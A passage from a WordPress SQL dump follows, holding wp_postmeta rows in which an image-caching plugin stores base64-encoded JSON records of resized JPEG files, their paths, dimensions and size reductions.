ZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTczOC1jb250YWN0LXJlLW51LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxODEsInRpbWUiOjE0ODM1NzA5NzEsImlkIjoxNDE1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzM4LWNvbnRhY3QtcmUtbnUtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzgtY29udGFjdC1yZS1udS0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTczOC1jb250YWN0LXJlLW51LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxMTUsInRpbWUiOjE0ODM1NzA5NzQsImlkIjoxNDE1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzM4LWNvbnRhY3QtcmUtbnUtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzgtY29udGFjdC1yZS1udS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTczOC1jb250YWN0LXJlLW51LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxMzgsInRpbWUiOjE0ODM1NzA5NzcsImlkIjoxNDE1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzM4LWNvbnRhY3QtcmUtbnUtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzgtY29udGFjdC1yZS1udS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTczOC1jb250YWN0LXJlLW51LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwOTc5LCJpZCI6MTQxNX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTczOC1jb250YWN0LXJlLW51LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzM4LWNvbnRhY3QtcmUtbnUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03MzgtY29udGFjdC1yZS1udS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDk4MiwiaWQiOjE0MTV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzgtY29udGFjdC1yZS1udS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTczOC1jb250YWN0LXJlLW51LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzM4LWNvbnRhY3QtcmUtbnUtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzA5ODQsImlkIjoxNDE1fV0='); 
INSERT INTO `wp_postmeta` VALUES (29515, 1414, 'wpfc_optimisation_reduction', '2156470'); 
INSERT INTO `wp_postmeta` VALUES (29516, 1414, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwbC1jb250YWN0LXJlLW51LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwbC1jb250YWN0LXJlLW51LmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03MzBsLWNvbnRhY3QtcmUtbnUuanBnIiwicmVkdWN0aW9uIjoyMTU2MDMxLCJ0aW1lIjoxNDgzNTcwOTk1LCJpZCI6IjE0MTQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTczMGwtY29udGFjdC1yZS1udS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTczMGwtY29udGFjdC1yZS1udS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTczMGwtY29udGFjdC1yZS1udS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDk5OCwiaWQiOjE0MTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwbC1jb250YWN0LXJlLW51LTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwbC1jb250YWN0LXJlLW51LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzMwbC1jb250YWN0LXJlLW51LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMDAxLCJpZCI6MTQxNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzBsLWNvbnRhY3QtcmUtbnUtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzBsLWNvbnRhY3QtcmUtbnUtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03MzBsLWNvbnRhY3QtcmUtbnUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEwMDQsImlkIjoxNDE0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTczMGwtY29udGFjdC1yZS1udS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzBsLWNvbnRhY3QtcmUtbnUtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTczMGwtY29udGFjdC1yZS1udS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMDA4LCJpZCI6MTQxNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzBsLWNvbnRhY3QtcmUtbnUtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzBsLWNvbnRhY3QtcmUtbnUtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03MzBsLWNvbnRhY3QtcmUtbnUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEwMTAsImlkIjoxNDE0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTczMGwtY29udGFjdC1yZS1udS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTczMGwtY29udGFjdC1yZS1udS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTczMGwtY29udGFjdC1yZS1udS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTAxMywiaWQiOjE0MTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwbC1jb250YWN0LXJlLW51LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwbC1jb250YWN0LXJlLW51LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzMwbC1jb250YWN0LXJlLW51LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMDE2LCJpZCI6MTQxNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzBsLWNvbnRhY3QtcmUtbnUtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzBsLWNvbnRhY3QtcmUtbnUtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03MzBsLWNvbnRhY3QtcmUtbnUtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEwMTgsImlkIjoxNDE0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwbC1jb250YWN0LXJlLW51LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwbC1jb250YWN0LXJlLW51LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzMwbC1jb250YWN0LXJlLW51LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxNTUsInRpbWUiOjE0ODM1NzEwMjEsImlkIjoxNDE0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwbC1jb250YWN0LXJlLW51LTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwbC1jb250YWN0LXJlLW51LTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzMwbC1jb250YWN0LXJlLW51LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxMzgsInRpbWUiOjE0ODM1NzEwMjMsImlkIjoxNDE0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwbC1jb250YWN0LXJlLW51LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwbC1jb250YWN0LXJlLW51LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzMwbC1jb250YWN0LXJlLW51LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxMzUsInRpbWUiOjE0ODM1NzEwMjYsImlkIjoxNDE0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwbC1jb250YWN0LXJlLW51LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwbC1jb250YWN0LXJlLW51LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzMwbC1jb250YWN0LXJlLW51LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMDI5LCJpZCI6MTQxNH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTczMGwtY29udGFjdC1yZS1udS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTczMGwtY29udGFjdC1yZS1udS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTczMGwtY29udGFjdC1yZS1udS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTAzMSwiaWQiOjE0MTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzBsLWNvbnRhY3QtcmUtbnUtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzBsLWNvbnRhY3QtcmUtbnUtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03MzBsLWNvbnRhY3QtcmUtbnUtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEwMzQsImlkIjoxNDE0fV0='); 
INSERT INTO `wp_postmeta` VALUES (29517, 1413, 'wpfc_optimisation_reduction', '2179391'); 
INSERT INTO `wp_postmeta` VALUES (29518, 1413, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwLWNvbnRhY3QtcmUtbnUuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzAtY29udGFjdC1yZS1udS5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzMwLWNvbnRhY3QtcmUtbnUuanBnIiwicmVkdWN0aW9uIjoyMTc4OTI3LCJ0aW1lIjoxNDgzNTcxMDQ1LCJpZCI6IjE0MTMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTczMC1jb250YWN0LXJlLW51LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwLWNvbnRhY3QtcmUtbnUtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03MzAtY29udGFjdC1yZS1udS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTA0OCwiaWQiOjE0MTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzMwLWNvbnRhY3QtcmUtbnUtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzAtY29udGFjdC1yZS1udS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTczMC1jb250YWN0LXJlLW51LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMDUxLCJpZCI6MTQxM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzAtY29udGFjdC1yZS1udS03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTczMC1jb250YWN0LXJlLW51LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzMwLWNvbnRhY3QtcmUtbnUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEwNTQsImlkIjoxNDEzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTczMC1jb250YWN0LXJlLW51LTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTczMC1jb250YWN0LXJlLW51LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03MzAtY29udGFjdC1yZS1udS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMDU3LCJpZCI6MTQxM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MzAtY29udGFjdC1yZS1udS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTczMC1jb250YWN0LXJlLW51LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzMwLWNvbnRhY3QtcmUtbnUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEwNj